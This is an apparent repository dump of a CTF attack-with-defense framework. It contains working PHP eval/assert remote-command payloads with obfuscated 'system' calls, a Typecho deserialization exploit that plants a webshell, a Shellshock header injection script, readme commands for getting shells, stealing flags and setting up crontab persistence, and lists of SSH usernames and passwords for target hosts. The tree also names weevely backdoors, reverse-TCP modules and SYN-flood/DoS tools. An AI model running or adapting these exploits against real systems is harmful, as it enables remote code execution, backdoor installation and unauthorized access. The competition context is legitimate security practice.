├── .gitignore ├── auto_ssh.py ├── autossh ├── friends.txt ├── gen.py ├── his ├── my.txt ├── now.txt ├── success.log ├── t_3 ├── targets └── test.txt ├── check.py ├── data ├── all_ip.data ├── gen.py ├── ip.data ├── ip.data.2 ├── ip.data.old ├── msg.data ├── p2p │ └── agent.php ├── ua.data └── weevely.key ├── framework ├── __init__.py ├── config.py ├── flag.py ├── function.py └── http.py ├── log └── sys.log ├── m.py ├── maintain ├── __init__.py └── function.py ├── my_web_trash.py ├── old_run.py ├── pwn ├── case2 ├── case2.c ├── pwn_2.py ├── pwn_pubg.py └── pwn_rand.py ├── readme ├── run.py ├── samples ├── __init__.py ├── call.py ├── call_2.py ├── eval.py ├── examples │ ├── call.py │ ├── eval.py │ ├── ln_read.py │ ├── read.py │ ├── upload.py │ └── weevely.py ├── ln_read.py ├── not_use │ ├── 1.php │ ├── 1.py │ ├── 2.py │ ├── 3.py │ ├── crontab.py │ ├── db_admin_attack.py │ ├── file_write.py │ ├── js_attack.py │ ├── js_exe.py │ ├── login.py │ ├── login_controller.go │ ├── new_replay.py │ ├── pwn_1.py │ ├── replay.py │ ├── ser.py │ └── tmp.php └── old │ ├── ali_assert.py │ ├── ass_read.py │ ├── ass_read2.py │ ├── bctf_exec.py │ ├── bctf_read.py │ ├── hctf_edit.py │ ├── hctf_image.py │ ├── hctf_inc.py │ ├── hctf_install.py │ ├── hctf_read.py │ ├── hwb_eval.py │ ├── hwb_read.py │ ├── hwb_up.py │ ├── hwb_up2.py │ ├── mysql.py │ ├── php_assert.py │ ├── php_input_include.py │ ├── php_system.py │ ├── php_weevely.py │ ├── qwb_block.py │ ├── qwb_block_2.py │ ├── qwb_block_3.py │ ├── qwb_datas.py │ ├── qwb_export.py │ ├── qwb_export_2.py │ ├── qwb_pwn_1.py │ ├── qwb_read.py │ ├── sample.py │ ├── sequence_attack_eval.py │ ├── shit_assert.py │ ├── shit_assert_2.py │ ├── shit_assert_3.py │ ├── shit_del.py │ ├── shit_read.py │ ├── shit_read2.py │ ├── shit_ser.py │ ├── shit_update.py │ ├── shit_upload.py │ ├── test_upload.py │ ├── tsctf_block.py │ ├── tsctf_read.py │ ├── tsctf_read2.py │ ├── tsctf_read3.py │ ├── tsctf_read4.py │ ├── tsctf_read6.py │ ├── wdb_assert.py │ ├── 
wdb_assert_2.py │ ├── wdb_assert_3.py │ ├── wdb_read.py │ ├── wdb_read2.py │ ├── wdb_read3.py │ ├── wdb_read4.py │ ├── wdb_up.py │ ├── yun_assert.py │ ├── yun_read2.py │ ├── yun_up2.py │ ├── yun_up3.py │ ├── yun_upload.py │ └── yunan_assert_1.py ├── script ├── .1.php ├── 1.php ├── README.md ├── docker.sh ├── http_dos.py ├── run.sh ├── server.py ├── sockstress ├── synflood ├── test.php ├── test.sh └── test2.sh ├── seq ├── __init__.py ├── attack.py ├── change_passeword │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ └── config.py ├── edit_page │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ └── config.py ├── example │ ├── 1.txt │ ├── __init__.py │ └── config.py ├── gen_py.py ├── image_upload │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ └── config.py ├── inc │ ├── 1.txt │ ├── 2.txt │ ├── __init__.py │ └── config.py ├── php_eval │ ├── 1.txt │ ├── __init__.py │ └── config.py ├── read_flag_qwb │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ └── config.py ├── shit_upload │ ├── 1.txt │ ├── 2.txt │ ├── __init__.py │ └── config.py ├── sql │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── __init__.py │ ├── config.py │ └── test.php ├── template_replay.py ├── test │ ├── 1.txt │ ├── 2.txt │ ├── 3.txt │ ├── 4.txt │ ├── __init__.py │ ├── config.py │ ├── test.txt │ └── traffic.txt └── upload │ ├── 1.txt │ ├── 2.txt │ ├── __init__.py │ └── config.py ├── trash_traffic ├── clean.sh ├── confused http traffic for AWD.md ├── filter.py ├── http.py ├── logs │ ├── 127.0.0.1:81 │ │ ├── 0385717216c5e9bc989f42b6273f9720 │ │ ├── 05bbc16d8111d19543ff787677cdd78e │ │ ├── 08854e8fe55ba0ca82a36563c349ed80 │ │ ├── 09e66a9eb1f1535a391705bf77e80a32 │ │ ├── 09f0b8edd4e30189c5fe8558aa326788 │ │ ├── 0d5fc2bd1e173f734b1eed31ad813d33 │ │ ├── 10ced345ee68280fa1a7ce77c3279971 │ │ ├── 12042bdb3697ff30b672c9fee930f72a │ │ ├── 12fa62a65058f210eea8a76603457614 │ │ ├── 1366f57b12557b9325c25a275fed4e39 │ │ ├── 14ae2b08aecb49bf588ed019898a984e │ │ ├── 1566708b8297f750f7ee4e046fc1ab75 │ │ 
├── 22dc502463205f40f7f5c236bfea32be │ │ ├── 23119d828c3d12b77a80ff3f8a198e54 │ │ ├── 32a04aa3fd0e050d364ffa69cf46fcaf │ │ ├── 355b08dbd868c54d902864ba1af537af │ │ ├── 3f3040d3e1851df8494a8347664424da │ │ ├── 406afdf837ed64606c003f664ff6ca0a │ │ ├── 4189ac8bf01ebe3f72832013d5bc23a2 │ │ ├── 42c46754edaa84a4d15766bb60e5a2c1 │ │ ├── 4a822e5f970a51b6d1f6f5ed4006c12d │ │ ├── 500071d296c34cc8a0b141047b111f6c │ │ ├── 50485ae16bace75f41366b3a30655a86 │ │ ├── 516162848c0a62e54d3ce9ded3e2026b │ │ ├── 52aada699f08652a2616b8df3feaf630 │ │ ├── 58cb2126f179f9a8a697ddeeb7ffb7aa │ │ ├── 5a662ea3a504ef206fdfac12c1bd2c5c │ │ ├── 5b9667273a0105dbd2db2a341f99ccc4 │ │ ├── 60e1a5be560235b745d9fd9907df6ba5 │ │ ├── 6a49106642b1aa1718f8474ff03612ea │ │ ├── 6b63153d63ac8a93f1c0deba57843891 │ │ ├── 6d105b09e66cfd76981e87f6be4a4fb6 │ │ ├── 740ee8f3c4727f410db70b45e1ab907e │ │ ├── 7476fb9090fde1efc8fa5327597e7954 │ │ ├── 7529f0051cc823b6f5169a5982080b80 │ │ ├── 7acdf0f96512b48b34c7251d3874d732 │ │ ├── 7bae936040765ecb08fc8b245f5d0215 │ │ ├── 80c007c9790f7393f760bbfdc5ded6ac │ │ ├── 8296563bd0061a8167ede1b37620f745 │ │ ├── 8578297d1c65fb4c6a383ab7a8215871 │ │ ├── 8cdda0b41c00bc6c70fd446236826d3f │ │ ├── 8cdfb3ef51d203323e959ada34133533 │ │ ├── 8e920d93b52110ab73567c6b542c0288 │ │ ├── 8f2c52177387ff26b562d75b0123d126 │ │ ├── 8fe6526b868357128f327e96f00a9317 │ │ ├── 94e05430dff3749b36c944dbdc2115e0 │ │ ├── 97dc0c478a9615e246b9ced2ea776a85 │ │ ├── 99ad37bc2268f156ef5965331b7eb3cf │ │ ├── 9d63dce7c4ca1a01d4883ad458752beb │ │ ├── 9d925962abb90e2372e005c11dd50c56 │ │ ├── 9d99e6335bda991c84012d17a7303c6f │ │ ├── ad140c4416a8f5ebb0dc1185c54d3542 │ │ ├── b4c39aa72a9f0a4f3ce3947ac130aaab │ │ ├── b5af33cf20bc27b2db223d09095decab │ │ ├── b60397ac7d1f4e4671ff7165986820d0 │ │ ├── bb776e377bc7d36d77e93fd7addb39ae │ │ ├── c126094582f53559774ce132f5610365 │ │ ├── c65d1a22181719fe1c1bd69f6441217e │ │ ├── c7430fe81b5eb303066cd85c3680e657 │ │ ├── cf279ed506ce6b90747389a233d6947b │ │ ├── 
d796132a3962b4adf36bef0efc171fe5 │ │ ├── dd857bb8e6b7e0475ded3e21327fcfa6 │ │ ├── dee3e14f7f7908fbdbd1e4a525e5280b │ │ ├── e1dc6aaa571539a516006f0a2d61e081 │ │ ├── e485b404e69dc2b9eee03a2a5750f575 │ │ ├── e5f5c5375278e1ba2bf39abf8e8cdc87 │ │ ├── e7a653ceec5addaf2f8e78698da6d295 │ │ ├── eab0411f1728196f1cc48665921e75cf │ │ ├── eabfc696c98c0843a70e46aea2eba60f │ │ ├── f0b01d66e4ce1473ce140e9a187657a3 │ │ ├── f4e70e5af5ec300379e5f1d9b3ff10bd │ │ ├── f7d98be8637791de8ea464b5944d7fa4 │ │ └── fde7b654f3f65d11403d005916ff5476 │ ├── 127.0.0.1:8889 │ │ ├── 046656fb8d2aad4a37955ce4adc692f8 │ │ ├── 096f53ef515da5c799183b6842e34e10 │ │ ├── 20d50bb39b6752e50e7407ea2c40df88 │ │ ├── 21aaf9b4ba8ebf8ac8e729cd5198b5a2 │ │ ├── 2aa437cb39bf02a37f89be158dc34310 │ │ ├── 754f79748331ccc566e899367fa586dc │ │ ├── 7c87f6168eb5ab1dad22f426261c716a │ │ ├── acc885b704b5316915aafff07d0be1a2 │ │ ├── b49519e42b1a1bb606f5f2f7876dacfe │ │ ├── c06eb1fb8a187f9f495b8afcbe4ab8a6 │ │ ├── c0ec7f723d52510b0cb6cc1904eff237 │ │ ├── d4e24a5cc6c072f4e2449ed3b12bc966 │ │ ├── d525a7610da34ff148d8d522838d1f3b │ │ ├── f50fcb24a06165085c343ee7666caa06 │ │ └── f962c893b4ecd1a3a695d6e4071841db │ ├── 192.168.2.127 │ │ ├── 09f040c64cf1905b60979559d73fb27b │ │ ├── 0a8c1759c642cd26e45083060c40ed8f │ │ ├── 0fb0bda9efcc44896c860c5cce69c4b3 │ │ ├── 10db3ccbb640765e1f6612eeb48897cc │ │ ├── 18d2f7b240b161331ad789d58fdb25e2 │ │ ├── 1b821344794430217feee99394fbefd5 │ │ ├── 1f938e64baa94af14bf32ae417874d83 │ │ ├── 239492021fad8478a7c79a0a6af233ff │ │ ├── 2c14de939cb962e2b87b55788da1c5d3 │ │ ├── 2caff59e103db95687cf593341f009e3 │ │ ├── 330a3b176313d11d7b968a84ceb8830c │ │ ├── 377d6788a228968d5c38649bb9eacc9d │ │ ├── 387ff72aeeee3a8fa1b9271aa6de1a61 │ │ ├── 3c3136b46f3aad02057b80b07d232315 │ │ ├── 40b8ac73d48cb23279853520e573fe7b │ │ ├── 41786e3fe033c73f7e689f67af086999 │ │ ├── 426f72c5f22d526019e1abb92b772f09 │ │ ├── 439d6c23d1ba92773a206b3763ccd562 │ │ ├── 45b61c6910187e00d3cbe13c85bf6eb4 │ │ ├── 
46adda9d9909ed9ad5f563b957b2e348 │ │ ├── 497c3ece2668c6198a5549a5665a8419 │ │ ├── 4b8fff9b79f4d88a14243767ecc72c27 │ │ ├── 4c5c76eacbceb1f4dfaed1883b1d3492 │ │ ├── 534811fae5754bd23f6ab7ff1b461133 │ │ ├── 5370b0e121f417adcc0bfc90c4c4cf19 │ │ ├── 5bed99b9b898be410eb75bc15a56018a │ │ ├── 6cbcebfc9e1438a26c4ae7f2e2ea004f │ │ ├── 721f58418e7e2fd251098cdd099c5214 │ │ ├── 79282fd15495861c0025c8b022fb11d0 │ │ ├── 841d3a91619d14fe87647cba6d111bc1 │ │ ├── 89b4b7929394050f2def9c1ec8eb90b3 │ │ ├── 8b299f0252d8aae317f0d2ff87e1f194 │ │ ├── 92acfd7c4d5c7cd451f4cb048dd2b8d8 │ │ ├── a19aa5308f87eda1d7912c76dd583630 │ │ ├── a48f7d2043a855b312c1ca9bec593ffc │ │ ├── a781aa11179a04c0a59ced51355bbd18 │ │ ├── aed34a18978e122fb4492ef7dbf67f29 │ │ ├── b09a68b48347d60b797d6b4bdaf4af63 │ │ ├── ba2a8aaf466b9ca940618d15f5d1879c │ │ ├── f50e7cfd508640f765009b5d35e145d0 │ │ └── fd7fe64158a2f910175df55e48b904bb │ └── comp:8803 │ │ ├── 0d8b909f9fd38a30f6bf46d95d50bf7a │ │ ├── 2be92810d446e87f8fc1ea6b5b555fd1 │ │ ├── 37463841def4257ed810469a2ccb53cd │ │ ├── 4da6321c52c6d896fe34ce84a94bf3c4 │ │ ├── 4efd38f94b8217cc7b7bbe63ec27e1a5 │ │ ├── 67a04f7eca2632f8b63466a43fd5ac8a │ │ ├── 7fcca04b79935afce5a218efda7e18cb │ │ ├── 9822836e4f3689687587b17b2cb9a8b7 │ │ ├── c4ee94df3ec4fccbccceeb21ccf155e8 │ │ ├── dd0863f4da9e66fa2a57d9b51b896bc1 │ │ ├── ec573e02f29cf6281480ef055bfb0d7d │ │ ├── f4791addbeaf5e819c92f1431ca413d2 │ │ └── f6e0d8635113b710f5dc0e7f6e8217c8 ├── pwn_trash.py ├── run.sh └── test.txt ├── utils ├── __init__.py ├── color.py ├── log.py └── weevely3 │ ├── bd │ ├── __init__.py │ ├── agents │ │ ├── legacycookie_php.tpl │ │ ├── stegaref_php.tpl │ │ └── stegaref_php_debug.tpl │ └── obfuscators │ │ ├── cleartext1_php.tpl │ │ └── obfusc1_php.tpl │ ├── core │ ├── __init__.py │ ├── argparsers.py │ ├── channels │ │ ├── __init__.py │ │ ├── channel.py │ │ ├── legacycookie │ │ │ ├── __init__.py │ │ │ └── legacycookie.py │ │ ├── legacyreferrer │ │ │ ├── __init__.py │ │ │ └── legacyreferrer.py │ │ └── 
stegaref │ │ │ ├── __init__.py │ │ │ ├── formatters.py │ │ │ ├── languages.txt │ │ │ ├── referrers.tpl │ │ │ ├── stegaref.py │ │ │ └── useragents.tpl │ ├── config.py │ ├── generate.py │ ├── loggers.py │ ├── messages.py │ ├── module.py │ ├── modules.py │ ├── sessions.py │ ├── terminal.py │ ├── vectorlist.py │ ├── vectors.py │ └── weexceptions.py │ ├── modules │ ├── __init__.py │ ├── audit │ │ ├── __init__.py │ │ ├── _disablefunctionbypass │ │ │ └── cgi.sh │ │ ├── _linuxprivchecker │ │ │ └── linuxprivchecker.py │ │ ├── disablefunctionbypass.py │ │ ├── etcpasswd.py │ │ ├── filesystem.py │ │ ├── linuxprivchecker.py │ │ ├── phpconf.py │ │ └── suidsgid.py │ ├── backdoor │ │ ├── __init__.py │ │ ├── _reversetcp │ │ │ ├── __init__.py │ │ │ └── tcpserver.py │ │ ├── reversetcp.py │ │ └── tcp.py │ ├── bruteforce │ │ ├── __init__.py │ │ ├── _sql │ │ │ ├── mysql.tpl │ │ │ └── pgsql.tpl │ │ └── sql.py │ ├── file │ │ ├── __init__.py │ │ ├── _bzip2 │ │ │ ├── EasyBzip2.class.php │ │ │ └── php_bzip2.tpl │ │ ├── _find │ │ │ └── bfs_walker.tpl │ │ ├── _gzip │ │ │ ├── EasyGzip.class.php │ │ │ └── php_gzip.tpl │ │ ├── _tar │ │ │ ├── EasyTar.class.php │ │ │ └── php_tar.tpl │ │ ├── _zip │ │ │ ├── EasyZip.class.php │ │ │ └── php_zip.tpl │ │ ├── bzip2.py │ │ ├── cd.py │ │ ├── check.py │ │ ├── clearlog.py │ │ ├── cp.py │ │ ├── download.py │ │ ├── edit.py │ │ ├── enum.py │ │ ├── find.py │ │ ├── grep.py │ │ ├── gzip.py │ │ ├── ls.py │ │ ├── mount.py │ │ ├── read.py │ │ ├── rm.py │ │ ├── tar.py │ │ ├── touch.py │ │ ├── upload.py │ │ ├── upload2web.py │ │ ├── webdownload.py │ │ └── zip.py │ ├── net │ │ ├── __init__.py │ │ ├── _curl │ │ │ ├── php_context.tpl │ │ │ ├── php_curl.tpl │ │ │ └── php_httprequest1.tpl │ │ ├── _phpproxy │ │ │ └── poxy.php │ │ ├── _scan │ │ │ └── fsockopen.tpl │ │ ├── curl.py │ │ ├── ifconfig.py │ │ ├── mail.py │ │ ├── phpproxy.py │ │ ├── proxy.py │ │ └── scan.py │ ├── shell │ │ ├── __init__.py │ │ ├── php.py │ │ ├── sh.py │ │ └── su.py │ ├── sql │ │ ├── __init__.py │ │ 
├── _dump │ │ │ └── mysqldump.tpl │ │ ├── console.py │ │ └── dump.py │ └── system │ │ ├── __init__.py │ │ ├── extensions.py │ │ └── info.py │ ├── requirements.txt │ ├── testsuite │ ├── __init__.py │ ├── base_fs.py │ ├── base_test.py │ ├── config.py.orig │ ├── test_channels.py │ ├── test_file_bzip2.py │ ├── test_file_cd.py │ ├── test_file_check.py │ ├── test_file_download.py │ ├── test_file_enum.py │ ├── test_file_find.py │ ├── test_file_grep.py │ ├── test_file_gzip.py │ ├── test_file_ls.py │ ├── test_file_read.py │ ├── test_file_tar.py │ ├── test_file_upload.py │ ├── test_file_upload2web.py │ ├── test_file_zip.py │ ├── test_generators.py │ ├── test_net_curl.py │ ├── test_net_proxy.py │ ├── test_shell_php.py │ ├── test_shell_sh.py │ ├── test_shell_su.py │ ├── test_sql_console.py │ ├── test_system_info.py │ └── test_terminal.py │ ├── utils │ ├── __init__.py │ ├── _http │ │ └── user-agents.txt │ ├── code.py │ ├── http.py │ ├── ipaddr.py │ ├── iputil.py │ ├── prettify.py │ └── strings.py │ └── weevely.py └── waf_check.py /.gitignore: -------------------------------------------------------------------------------- 1 | log/** 2 | *.py[cod] 3 | log/sys.log 4 | samples/*.pyc 5 | -------------------------------------------------------------------------------- /autossh/friends.txt: -------------------------------------------------------------------------------- 1 | ctf:humensec444:172.16.0.87:22 2 | ctf:humensec444:172.16.0.117:22 3 | ctf:humensec444:172.16.0.123:22 4 | ubuntu:humensec444:172.16.0.83:22 5 | ubuntu:humensec444:172.16.0.113:22 6 | ubuntu:humensec444:172.16.0.119:22 7 | -------------------------------------------------------------------------------- /autossh/gen.py: -------------------------------------------------------------------------------- 1 | x = '' 2 | for i in range(101,152): 3 | open('t_3','a').write('www-data:password:172.20.%d.101:22\n'%i) 4 | for i in range(101,152): 5 | open('t_3','a').write('www-data:password::172.20.%d.102:22\n'%i) 6 | 
-------------------------------------------------------------------------------- /autossh/his: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/autossh/his -------------------------------------------------------------------------------- /autossh/my.txt: -------------------------------------------------------------------------------- 1 | ctf:ctf:172.16.0.68:22 2 | ubuntu:openstack:172.17.0.64:22 3 | pwn4:pwn4:172.16.0.66:22 4 | -------------------------------------------------------------------------------- /autossh/now.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/autossh/now.txt -------------------------------------------------------------------------------- /autossh/success.log: -------------------------------------------------------------------------------- 1 | ctf:d967889fa3b1aa7ae29300f978f10949:192.168.37.101:22 2 | ctf:82f2757f7e3c8e2e0d7ffa3ac4fe917b:192.168.37.100:22 3 | ctf:94be7a6ec260a72f3be48242f0fca298:192.168.37.101:22 4 | ctf:3ccf950d0ada27bb9ae036ed4b3008f9:192.168.37.100:22 5 | ctf:cbaf88166589663190483c367ba8e930:192.168.37.101:22 6 | ctf:ab9ee16cf6b9604b4217cc966a0cc915:192.168.37.100:22 7 | ctf:cd333f8956231495b658a806dbdf9cc1:192.168.37.101:22 8 | ctf:960c22cebe7ec91e5da1e93e778e6fbc:192.168.37.100:22 9 | ctf:335f2526bbc9adff3e2a5aa1e139fbfd:192.168.37.101:22 10 | ctf:7d685ce43d5646e3aed5c9f8ff60ce79:192.168.37.100:22 11 | ctf:0ab627eb88dceb36227be06e8d87e7b5:192.168.37.101:22 12 | ctf:26e1550ee0ff6e229edbe0b825839607:192.168.37.100:22 13 | ctf:b2394ffb089e479cf649fa2af98b8e60:192.168.37.100:22 14 | ctf:6bec8dbe2392ac21e43e7ac6e4380749:192.168.37.100:22 15 | ctf:ad519eacf85e95a4f18c8e99a3d9a6a2:192.168.37.100:22 16 | ctf:25ceb3bc1c514655f700691ab4428ed0:192.168.37.100:22 17 | 
ctf:c24c006a5202c5df8088672d53fbd333:172.17.0.2:22 18 | ctf:18f121f98de29c1496ef9ef40cf76f5e:172.17.0.3:22 19 | ctf:0d2eba4097bca846418551d94c04e62a:172.17.0.2:22 20 | ctf:df6ba742ac774ea5fa9e419caa6cd97e:172.17.0.3:22 21 | -------------------------------------------------------------------------------- /autossh/targets: -------------------------------------------------------------------------------- 1 | ctf:ctf:mut-orff.org:22 2 | -------------------------------------------------------------------------------- /autossh/test.txt: -------------------------------------------------------------------------------- 1 | ctf:ctf:192.168.37.100:22 2 | ctf:ctf:192.168.37.101:22 3 | -------------------------------------------------------------------------------- /data/all_ip.data: -------------------------------------------------------------------------------- 1 | 192.168.1.117:80 2 | 192.168.1.118:80 3 | 192.168.1.119:80 4 | 192.168.1.120:80 5 | 192.168.1.121:80 6 | 192.168.1.122:80 7 | 192.168.1.123:80 8 | 192.168.1.124:80 9 | 192.168.1.125:80 10 | 192.168.1.126:80 11 | -------------------------------------------------------------------------------- /data/gen.py: -------------------------------------------------------------------------------- 1 | open('ip.data','w').write("") 2 | 3 | for i in range(1,21): 4 | open('ip.data','a').write("192.168.%d.12:20002\n"%i) 5 | 6 | 7 | -------------------------------------------------------------------------------- /data/ip.data: -------------------------------------------------------------------------------- 1 | 192.168.1.12:20002 2 | 192.168.2.12:20002 3 | 192.168.3.12:20002 4 | 192.168.4.12:20002 5 | 192.168.5.12:20002 6 | 192.168.6.12:20002 7 | 192.168.7.12:20002 8 | 192.168.8.12:20002 9 | 192.168.9.12:20002 10 | 192.168.10.12:20002 11 | 192.168.11.12:20002 12 | 192.168.12.12:20002 13 | 192.168.13.12:20002 14 | 192.168.15.12:20002 15 | 192.168.16.12:20002 16 | 192.168.17.12:20002 17 | 192.168.18.12:20002 18 | 192.168.19.12:20002 19 
| 192.168.20.12:20002 20 | -------------------------------------------------------------------------------- /data/ip.data.2: -------------------------------------------------------------------------------- 1 | 192.168.1.12:20002 2 | 192.168.6.12:20002 3 | 192.168.8.12:20002 4 | 192.168.9.12:20002 5 | 192.168.10.12:20002 6 | 192.168.11.12:20002 7 | 192.168.13.12:20002 8 | 192.168.15.12:20002 9 | 192.168.16.12:20002 10 | 192.168.17.12:20002 11 | 192.168.18.12:20002 12 | 192.168.19.12:20002 13 | 192.168.20.12:20002 14 | -------------------------------------------------------------------------------- /data/ip.data.old: -------------------------------------------------------------------------------- 1 | 192.168.1.117:80 2 | 192.168.1.118:80 3 | 192.168.1.119:80 4 | 192.168.1.120:80 5 | 192.168.1.121:80 6 | 192.168.1.122:80 7 | 192.168.1.123:80 8 | 192.168.1.124:80 9 | 192.168.1.125:80 10 | 192.168.1.126:80 11 | -------------------------------------------------------------------------------- /data/msg.data: -------------------------------------------------------------------------------- 1 | GET*---craso---*/Less-1/*---craso---*id={crasolee_para} 2 | GET*---craso---*/Less-1/*---craso---*id={crasolee_para} 3 | POST*---craso---*/Less-13/*---craso---*passwd={crasolee_para}&uname=aaaaaa&submit=Submit 4 | POST*---craso---*/Less-13/*---craso---*passwd=6666666&uname={crasolee_para}&submit=Submit 5 | POST*---craso---*/Less-13/*---craso---*passwd=6666666&uname=aaaaaa&submit={crasolee_para} 6 | GET*---craso---*/Less-1/*---craso---*{crasolee_para0}={crasolee_para} -------------------------------------------------------------------------------- /data/weevely.key: -------------------------------------------------------------------------------- 1 | d951118f -------------------------------------------------------------------------------- /framework/__init__.py: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/framework/__init__.py -------------------------------------------------------------------------------- /log/sys.log: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /maintain/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/maintain/__init__.py -------------------------------------------------------------------------------- /maintain/function.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework import config -------------------------------------------------------------------------------- /pwn/case2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/pwn/case2 -------------------------------------------------------------------------------- /pwn/case2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char g_buf[4]; 7 | 8 | int main(int argc, char **argv, char**envp){ 9 | int off = atoi(argv[1]); 10 | srand(time(0) + off); 11 | g_buf[0] = rand() % 26 + 65; 12 | g_buf[1] = rand() % 26 + 65; 13 | g_buf[2] = rand() % 26 + 65; 14 | 15 | unsigned int a,b,c; 16 | unsigned int d,e; 17 | a = rand() % 3; 18 | b = rand() % 3; 19 | c = rand() % 3; 20 | 21 | d = rand() % 6; 22 | e = rand() % 6; 23 | 24 | printf("%x,%x,%x,%x,%x,%x,%x,%x", g_buf[0], g_buf[1], g_buf[2], a, b, c, d, e); 25 | return 0; 26 | } -------------------------------------------------------------------------------- /readme: 
-------------------------------------------------------------------------------- 1 | 2 | python run.py -m edit -c change_password 3 | 4 | python run.py -m edit -c create_p2p 5 | 6 | 7 | Suggested commands after you find a vulnerability: 8 | 9 | python run.py -m edit -c get_shell -r 10 | python run.py -m edit -c get_flag -r 11 | python run.py -m edit -c crontab_submit_flag -r -l 1 12 | python run.py -m edit -c create_p2p -r 13 | python run.py -m edit -c run_p2p -r -l 1 14 | python run.py -m edit -c create_p2p -r 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /samples/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/samples/__init__.py -------------------------------------------------------------------------------- /samples/eval.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'c=%s'% quote(payload) 25 | res = http("post",target,target_port,"/a.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | 
-------------------------------------------------------------------------------- /samples/examples/eval.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = '222=%s'% quote(payload) 25 | res = http("post",target,target_port,"/1.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/not_use/1.php: -------------------------------------------------------------------------------- 1 | _version = $version; 12 | $this->_type = $type; 13 | $this->_charset = $charset; 14 | $this->_lang = $lang; 15 | } 16 | public function addItem(array $item) 17 | { 18 | $this->_items[] = $item; 19 | } 20 | } 21 | class Typecho_Request 22 | { 23 | private $_params = array('screenName'=>'fputs(fopen(\'./usr/uploads/.a.php\',\'w\'),\'\')'); 24 | private $_filter = array('assert'); 25 | //private $_filter = array('assert', array('Typecho_Response', 'redirect')); 26 | } 27 | $payload1 = new Typecho_Feed(5, 'ATOM 1.0'); 28 | $payload2 = new Typecho_Request(); 29 | $payload1->addItem(array('author' => $payload2)); 30 | $exp['adapter'] = $payload1; 31 | $exp['prefix'] = 
'Rai4over'; 32 | echo base64_encode(serialize($exp)); 33 | -------------------------------------------------------------------------------- /samples/not_use/1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from http import http 4 | from config import * 5 | from function import * 6 | 7 | ''' 8 | this is the payload script for vuln shellshock 9 | 10 | ''' 11 | 12 | 13 | def attack(target,cmd,get_flag): 14 | is_vuln = 1 15 | flag = "hello world!" 16 | info = "success" 17 | reserve = 0 18 | 19 | 20 | if check_shell(target,""): 21 | res = execute_shell(target,cmd) 22 | else: 23 | dump_warning(target,"check_shell failed","function.py check_shell") 24 | ''' 25 | put your payload code here 26 | 27 | ''' 28 | header = {"User-Agent": "() { :; }; "+cmd} 29 | try: 30 | res = http("get",target,target_port,"/ez_web/cgi-bin/skin_api.cgi","",header) 31 | except Exception,e: 32 | print e 33 | if "500" not in res : 34 | dump_error(target,"not vulnerable","1.py bashshock") 35 | 36 | if get_flag: 37 | if check_flag(res): 38 | flag = res 39 | print "flag => " + res.replace(" ","").replace("\n","") 40 | else: 41 | dump_warning(target,"flag format error,you may need to rewrite the shell", "1.py attack") 42 | else: 43 | dump_success(target,"execution cmd","1.py") 44 | print res 45 | 46 | 47 | print "test for bashshock attacking......." 
